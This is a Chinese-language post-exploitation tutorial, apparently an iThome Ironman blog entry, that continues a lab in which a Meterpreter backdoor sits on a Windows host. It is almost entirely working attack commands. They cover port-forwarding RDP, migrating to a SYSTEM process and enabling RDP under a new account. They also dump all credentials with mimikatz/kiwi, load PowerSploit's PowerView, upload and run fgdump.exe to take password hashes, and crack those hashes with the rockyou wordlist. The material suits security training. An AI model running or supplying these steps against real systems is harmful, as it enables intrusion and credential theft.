當惡意攻擊者入侵企業之後,會從第一台入口點開始往內部進行攻擊,有些企業會使用 Windows AD 進行權限控管,因此線在對於 Windwos AD 的安全性也很重要。
接續昨天的情境,第一台入口機器被植入 Meterpreter 後門之後,可以用那些指令進行後滲透。
use post/multi/manage/shell_to_meterpreterset session 1
run
實驗期間有可能會有 shell 不穩的狀態,多嘗試幾次!
當受害主機可能開啟了 RDP (遠端桌面)但因為防火牆阻擋或其他原因,導致無法連到受害主機,因此可以將受害主機的 port 轉發到攻擊主機,直接存取攻擊主機的轉發過來的 port 就可以連接到受害主機的 port,我們透過指令 portfwd 進行測試。
轉發指定端口portfwd add -l 3389 -p 3389 -r [target]
| 參數 | 說明 |
|---|---|
| -l | 監聽的 port |
| -p | 受害主機的 port |
| -r | 受害主機IP |
確認目前已經轉發的 portportfwd list
確認攻擊主機是否有監聽 3389netstat -antup
安裝 rdesktopsudo apt install rdesktop
進行本地連線rdesktop 127.0.0.1:3389
主要連線連到本機(127.0.0.1)的 3389 port,但因為 port 已經轉發到受害主機的 3389,因此連線畫面其實是受害主機的連線畫面。
刪除轉發的 portportfwd delete -l 3389 -p 3389 -r [target]
一次刪除所有 portfwdportfwd flush
ps
migrate <PID> 合併,可以用 getuid 確認
background,並且查看 sessions 確認自己已經提權到 SYSTEM
use post/windows/mange/enable_rdp
5. 設定參數set username feifeiset password feitestset session 1run
load mimikatz
因為現在 mimikatz 已經合併,因此直接使用 load kiwi
查看所有帳號密碼creds_all
查看所有 kerberos 密碼creds_kerberos
查看所有 msv 密碼creds_msv
查看所有 wdigest 密碼creds_wdigest
查看版本kiwi_cmd version
使用 mimikatz 的指令kiwi_cmd <mimikatz模組>
kiwi_cmd ::
查看 mimikatz 的模組
查看 sekurlsa 模組kiwi_cmd sekurlsa::
使用 sekurlsa 中的 msv 指令kiwi_cmd sekurlsa::msv
load powershell
powershell_execute 執行 powershell 指令powershell_import 引用其他工具powershell_shell 直接進行互動powershell_execute "$PSVersionTable"
下載後滲透工具git clone https://github.com/PowerShellMafia/PowerSploit
確認我們需要的工具
** import 指定工具**
將工具 load 進去powershell_import "/home/user/PowerSploit/Recon/PowerView.ps1"
powershell_execute Get-NetLoggedon
可直接使用 powershell 互動powershell_shell$PSVersionTable
hashdump
檔案:https://github.com/interference-security/kali-windows-binaries/blob/master/fgdump/fgdump.exe
將這個 exe 下載到家目錄。
上傳 fgdump.exe 到受害主機upload /home/user/fgdump.exe C:\\
進入 shell 模式shell
切換到 Ccd ..cd ..
執行 fgdump.exefgdump.exe
確認檔案名稱dir127.0.0.1pwdump
查看 hashtype 127.0.0.1pwdump
下載指定檔案download 127.0.0.1pwdump
使用 rockyou 字典檔爆破密碼
iThome鐵人賽
看影片追技術